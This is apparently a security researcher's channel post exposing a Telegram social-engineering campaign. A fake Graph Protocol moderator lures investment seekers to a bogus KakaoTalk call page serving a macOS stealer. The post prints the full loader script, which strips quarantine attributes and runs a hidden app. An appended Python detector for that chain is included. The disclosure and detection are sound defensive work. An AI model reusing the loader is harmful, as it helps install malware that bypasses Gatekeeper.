OPENVPN Telegram 812
Another distribution campaign.

@evabeylin (#5817609036), stated to be a moderator/admin of the Graph Protocol chat group, is looking for projects that need investment.
She starts a conversation, chats, and then invites the target to a call using the link http://kakao.us.com/?join=4AT3IL (the link now leads to https://jprs.co.jp/en/).

The page offers an app to download for the call.
For OSX it is a DMG file with a size of 742 KB.

Inside is a shell script that you are asked to drag and drop into Terminal.
Doing so installs the stealer.

The loader is:

#!/bin/bash
osascript -e 'on run
try
set diskList to list disks
end try
set targetDisk to ""
try
repeat with disk in diskList
if disk contains "KakaoTalk" then
set targetDisk to disk
exit repeat
end if
end repeat
end try
if targetDisk is "" then
return
end if
set folderPath to "/Volumes/" & targetDisk & "/"
set appName to ".KakaoTalk"
set appPath to folderPath & appName
set tempAppPath to "/tmp/" & appName
try
do shell script "rm -f " & quoted form of tempAppPath
end try
try
do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
end try
try
do shell script "xattr -c " & quoted form of tempAppPath
end try
try
do shell script "chmod +x " & quoted form of tempAppPath
end try
try
do shell script quoted form of tempAppPath
end try
end run'


Stealer on VirusTotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
The campaign also targeted Linux and Windows.

Stranger, be careful: a contact having admin status in some groups does not guarantee security.

Update: Graph Protocol just removed the mention of @evabeylin from posts.



BY Adventures in Dystopia
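The loader above copies a hidden file from the mounted volume to /tmp, clears its extended attributes with xattr -c (which drops the quarantine attribute), marks it executable and runs it. As an added example that is not part of the original post, this Python sketch correlates that chain over process command lines; the input format (one command line per record), the helper names and the sample records are assumptions constructed for illustration.

```python
import re
import shlex

HIDDEN_ON_VOLUME = re.compile(r"^/Volumes/[^/]+/\.[^/]+$")  # /Volumes/<vol>/.<name>
REQUIRED = {"copied", "xattr_cleared", "executed"}

def _norm(path):
    # /tmp is a symlink to /private/tmp on macOS; treat both spellings alike
    return path[len("/private"):] if path.startswith("/private/tmp/") else path

def _adds_exec(mode):
    if mode.isdigit():  # numeric mode such as 755
        return any(int(d) & 1 for d in mode)
    return "+" in mode and "x" in mode.split("+", 1)[1]  # +x, u+x, a+rx

def correlate(cmdlines):
    """Map each staged /tmp path to the loader stages observed for it."""
    seen = {}
    for line in cmdlines:
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: skip the record
            continue
        if not argv:
            continue
        prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]
        paths = [_norm(a) for a in args if not a.startswith("-")]
        if prog == "cp" and len(paths) == 2:
            if HIDDEN_ON_VOLUME.match(paths[0]) and paths[1].startswith("/tmp/"):
                seen.setdefault(paths[1], set()).add("copied")
        elif prog == "xattr" and "-c" in args:
            for p in paths:  # .get() yields a throwaway set for untracked paths
                seen.get(p, set()).add("xattr_cleared")
        elif prog == "chmod" and _adds_exec(args[0] if args else ""):
            for p in paths:
                seen.get(p, set()).add("made_executable")
        elif _norm(argv[0]) in seen:
            seen[_norm(argv[0])].add("executed")
    return seen

def alerts(cmdlines):
    return sorted(p for p, st in correlate(cmdlines).items() if REQUIRED <= st)

# Constructed sample records (not captured telemetry); paths follow the loader above.
SAMPLE = ["cp /Volumes/Backup/report.pdf /tmp/report.pdf", "xattr -c /tmp/report.pdf",
          "rm -f '/tmp/.KakaoTalk'", "cp '/Volumes/KakaoTalk/.KakaoTalk' '/tmp/.KakaoTalk'",
          "xattr -c '/tmp/.KakaoTalk'", "chmod +x '/tmp/.KakaoTalk'", "'/tmp/.KakaoTalk'"]
if __name__ == "__main__":
    print(alerts(SAMPLE))
```

The records must be fed in execution order, and staging into directories other than /tmp is not covered by this sketch.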








